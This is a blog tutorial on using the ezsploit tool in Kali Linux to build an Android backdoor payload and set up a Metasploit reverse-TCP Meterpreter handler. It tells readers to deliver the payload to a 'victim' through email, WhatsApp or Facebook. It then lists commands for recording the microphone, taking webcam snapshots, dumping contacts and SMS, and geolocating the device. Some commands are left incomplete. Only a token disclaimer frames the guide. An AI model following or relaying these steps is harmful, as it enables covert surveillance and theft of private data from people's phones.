How To Generate Payload – Backdoor Using ezsploit Tool and how to hack android device using ezsploit tool?

Hello guys , in this post today’s I am going to show you How To Generate  Payload – Backdoor Using ezsploit tool  and how to hack android device using ezsploit tool?” guys  Actually hacking android phone is quite tough task but thanks to kali linux operating which makes the hacking very easy.You can do almost anything by using simply kali linux because it have many feature and tools.There are more then 500+ tool available in kali os. Today I’m going to tell the tool , you can create a backdoor for windows,linux and mac very easily with this tool.
So friends Now see how to configure this EZsploit tool in kali linux.So follow below given steps carefully one by one.

Must Read –

  1.  How To Hack Computer Using KaliLinux?
  2. Hack Android Phone Using Kali Linux

Warning : This post is only for educational purpose, we are not responsible for any illegal work done by you.

Part1:  How to create payload for windows, linux , mac & android ?

Step1; First of all you need to open your kali linux terminal and enter this command “cd desktop” for going to your desktop because in desktop you need to install ezsploit tool.

how to create

Step2; Now You need to download ezsploit tool by executing this command in terminal window of kali linux –/Desktop# git clone

how to create

Step3; Now downloading of ezsploit tool will start and after that you can see a ezsploit file in your desktop, so you need to wait for downloading it completely . and Now again go to terminal window of kali linux and execute this command cd ezsploit

how to create

Step4; again execute this command ls , and You will now be able to see two files. ,

how to create

Step5; Now to install this tool in kali linux, to install this tool first we have to give chmod permision. Type the command for this chmod +x and press enter button.

how to create

Step6; Now you can run this tool easily, that give this command ./  and press enter button. 

how to create

Step7; Now a screen will come having many option like payload, listen,exploit,persistence  and many more option you will see there.Now here you need to first choose you are going to create the payload  for type 1 .

how to create

Step8; Now here you need to first choose you are going to create the payload  for which operating system , i mean windows,linux or android .Now i assume that you are going to create the payload for android device the execute the associated number like 4 (Android is on fourth position among the rest option).

how to create

Note : Here I am using Local Network for this, so I have local ip, if you are using on the public network then put your static ip.

Step9; After that it will ask for Set LHOST  IP ,simply here if you want to use your payload remotely then you’ll need to enter your static ip here and press enter.For checking your ip simply execute this command in your terminal ifconfig  and then Now enter the Set LPORT  4444 and then press enter button.

Step10; You will see that the payload for Android has been created, you will find it in the Temp folder on the desktop.

Part2: How to hack android phone using ezsploit?

You learned to create payload for Android in Part 1.

you need to send this payload to your victim any how for example Email,WhatsApp,Facebook etc any other medium which you prefer easy.And when your victim double click on it then your payload is ready for sending the data of victim’s machine.

Step1; Now you open the tool again, and  give this command ./ and press enter button.

Step2; Now i assume that you are going to start exploit ,  the execute the associated number like 3
(Exploit is on third position among the rest option)

Step3; You will now see that the Metasploit has been open in the terminal window.

Step4; Now write the following command and after writing each command hit enter.

msf  > use multi/handler  (press enter button)

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > run

Step5; Now after that the you can try the following Command:
– record_mic         
– webcam_snap    
– webcam_stream
– dump_contacts  
– dump_sms         
– geolocate            

So friends this is the end of the article ,if you like this post please share it your friends.If you face some problem in any steps please drop your email by going to contact us section of this site. thank you so much ,stay tune with this blog and blog’s admin Mr. Aditya Singh

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